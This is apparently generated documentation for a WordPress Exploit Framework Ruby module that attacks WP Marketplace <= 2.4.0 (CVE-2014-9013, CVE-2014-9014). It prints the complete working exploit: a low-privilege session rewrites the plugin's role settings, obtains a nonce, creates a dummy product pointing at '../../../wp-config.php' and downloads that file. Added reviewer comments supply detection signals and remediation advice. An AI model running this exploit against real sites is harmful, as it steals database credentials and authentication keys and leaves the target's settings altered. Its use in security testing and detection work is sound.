class Wpxf::Auxiliary::WpMarketplaceV24FileDownload

Attributes

download_id[RW]

Public Class Methods

new()
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 6
# Builds the module: runs the parent initializer, records the module's
# descriptive metadata, and declares the single option this module adds.
#
# Reviewer notes (defensive context, taken from the metadata below):
# - Affected software is stated as WP Marketplace <= 2.4.0; the advisories
#   cited are WPVDB 7861, CVE-2014-9013 and CVE-2014-9014.
# - The description states that any registered user level is sufficient, so
#   open self-registration on a site running an affected version widens the
#   exposure.
# - `user_role` is required and defaults to 'Subscriber'; in this listing it
#   is read (downcased) by #modify_plugin_permissions.
def initialize
  super

  contributors = [
    'Kacper Szurek', # Disclosure
    'rastating'      # WPXF module
  ]

  advisories = [
    ['WPVDB', '7861'],
    ['CVE', '2014-9013'],
    ['CVE', '2014-9014'],
    ['URL', 'http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html']
  ]

  update_info(
    name: 'WP Marketplace <= 2.4.0 Arbitrary File Download',
    desc: %(
      This module exploits a vulnerability which allows registered users of any level
      to download any arbitrary file accessible by the user the web server is running as.
    ),
    author: contributors,
    references: advisories,
    date: 'Mar 21 2015'
  )

  # Role of the account whose session the module runs under.
  role_option = StringOption.new(
    name: 'user_role',
    desc: 'The role of the user account being used for authentication',
    default: 'Subscriber',
    required: true
  )

  register_options([role_option])
end

Public Instance Methods

before_download()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 116
# Preparation hook run ahead of the download request. It performs three steps
# in order and stops at the first one that fails:
#   1. #modify_plugin_permissions
#   2. #fetch_ajax_nonce (result kept in @nonce)
#   3. #create_product, under a freshly generated download id
#
# The download id is the digit "1" followed by the 5-character value returned
# by Utility::Text.rand_numeric(5).
#
# NOTE(review): steps 1 and 3 both change state on the target (plugin settings
# and a product record). Nothing in this listing reverts either change, so an
# assessment report should list them as artefacts left behind.
#
# @return [Boolean] false when step 1 or 2 fails; otherwise whatever
#   #create_product returns
def before_download
  permissions_changed = modify_plugin_permissions
  return false unless permissions_changed

  emit_info 'Modified plugin permissions successfully', true

  @nonce = fetch_ajax_nonce
  if @nonce
    emit_info "Acquired nonce \"#{@nonce}\"", true
    self.download_id = "1#{Utility::Text.rand_numeric(5)}"
    create_product
  else
    false
  end
end
check()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 38
# Version check for the target plugin. Delegates to
# check_plugin_version_from_changelog with the plugin slug, the file to read
# and a version string.
#
# NOTE(review): '2.4.1' is presumably the first fixed release (the module name
# says "<= 2.4.0") — confirm against the helper's signature. For defenders the
# practical reading is that sites should be on 2.4.1 or later.
#
# @return whatever check_plugin_version_from_changelog returns
def check
  plugin_slug = 'wpmarketplace'
  changelog_file = 'readme.txt'
  version_bound = '2.4.1'

  check_plugin_version_from_changelog(plugin_slug, changelog_file, version_bound)
end
create_product()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 94
# Submits the product form to the target with the previously fetched nonce
# (@nonce), the generated id (@download_id), a base price of '0' and
# `remote_file` as the single entry of the product's file list.
#
# A response with status 200 or 302 counts as success. Any other outcome
# (including no response) is reported through emit_error, with the inspected
# response emitted as a second, verbose-flagged message.
#
# NOTE(review): on success a product record remains on the target; no removal
# step is visible in this listing. On the defensive side, the fields worth
# noting are 'post_type' => 'wpmarketplace' together with a 'wpmp_list[file][]'
# value submitted by a low-privilege session.
#
# @return [Boolean] true on a 200/302 response, false otherwise
def create_product
  endpoint = full_uri
  form_fields = {
    '__product_wpmp' => @nonce,
    'post_type' => 'wpmarketplace',
    'id' => @download_id,
    'wpmp_list[base_price]' => '0',
    'wpmp_list[file][]' => remote_file
  }

  res = execute_post_request(url: endpoint, body: form_fields, cookie: session_cookie)

  accepted = res && (res.code == 200 || res.code == 302)
  if accepted
    true
  else
    emit_error 'Failed to create dummy product'
    emit_error res.inspect, true
    false
  end
end
default_remote_file_path()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 46
# Relative path of the file the module asks for by default.
#
# NOTE(review): read together with #working_directory in this listing
# ('wp-content/plugins/wpmarketplace'), three `..` segments would point at the
# WordPress root — presumably that is how the base class resolves the path;
# confirm against Wpxf::WordPress::FileDownload. wp-config.php normally holds
# the database credentials and the auth keys/salts, so a site that ran an
# affected plugin version should treat those values as disclosed and rotate
# them.
#
# @return [String] '../../../wp-config.php'
def default_remote_file_path
  '../../../wp-config.php'
end
download_request_method()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 129
# HTTP verb for the download request. Presumably read by the FileDownload
# base class when it issues the request — confirm there.
#
# @return [Symbol] :post
def download_request_method
  :post
end
download_request_params()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 137
# Parameters for the download request: a single 'wpmpfile' field carrying the
# current download id (the id assigned in #before_download).
#
# For log review, a POST carrying 'wpmpfile' from a low-privilege session is
# the request that returns the file contents.
#
# @return [Hash{String => Object}] { 'wpmpfile' => download_id }
def download_request_params
  product_ref = download_id
  { 'wpmpfile' => product_ref }
end
downloader_url()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 133
# URL the download request is sent to. This module uses the same `full_uri`
# value that its other requests in this listing are posted to.
#
# @return whatever `full_uri` returns
def downloader_url
  full_uri
end
fetch_ajax_nonce()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 73
# Requests the plugin's front-end "add product" form through its AJAX action
# and extracts the value of the hidden `__product_wpmp` field from the HTML.
#
# The field is only looked for when a response arrived with status 200. If no
# value is found, an error is emitted, followed by the inspected response as a
# verbose-flagged message.
#
# @return [String, false] the nonce value, or false when it could not be
#   obtained
def fetch_ajax_nonce
  res = execute_post_request(
    url: full_uri,
    body: { 'action' => 'wpmp_pp_ajax_call', 'execute' => 'wpmp_front_add_product' },
    cookie: session_cookie
  )

  # Case-insensitive match; capture group 1 is the attribute value.
  nonce_field = /name="__product_wpmp" value="([^"]+)"/i
  token = res&.code == 200 ? res.body[nonce_field, 1] : nil
  return token if token

  emit_error 'Failed to acquire a download nonce'
  emit_error res.inspect, true
  false
end
modify_plugin_permissions()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 54
# Posts the plugin's "save settings" AJAX action with the configured
# `user_role` option (downcased) as the only entry of
# `_wpmp_settings[user_role][]`.
#
# Success requires all of: a response, status 200, and a body matching
# "Settings Saved Successfully" (case-insensitive).
#
# NOTE(review): this is a persistent, state-changing request and nothing in
# this listing restores the previous setting, so the target's plugin
# configuration stays modified after the run. For detection, the request is a
# POST with action=wpmp_pp_ajax_call and execute=wpmp_save_settings; seeing it
# from a non-administrative session is the signal to alert on.
#
# @return [Boolean] true when the settings were reported as saved, else false
def modify_plugin_permissions
  endpoint = full_uri
  settings = {
    'action' => 'wpmp_pp_ajax_call',
    'execute' => 'wpmp_save_settings',
    '_wpmp_settings[user_role][]' => datastore['user_role'].downcase
  }

  res = execute_post_request(url: endpoint, body: settings, cookie: session_cookie)

  saved = res && res.code == 200 && res.body =~ /Settings Saved Successfully/i
  return true if saved

  emit_error 'Failed to modify the plugin permissions'
  false
end
requires_authentication()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 42
# Declares that the module needs an authenticated session. This matches the
# module description ("registered users of any level") and the
# `session_cookie` sent with every request in this listing. How the framework
# acts on this flag is not shown here.
#
# @return [Boolean] always true
def requires_authentication
  true
end
working_directory()
# File lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb, line 50
# Plugin directory, relative to the WordPress root, that this module reports
# as its working directory. Presumably the base class uses it to interpret
# relative paths such as #default_remote_file_path — confirm there.
#
# @return [String] 'wp-content/plugins/wpmarketplace'
def working_directory
  'wp-content/plugins/wpmarketplace'
end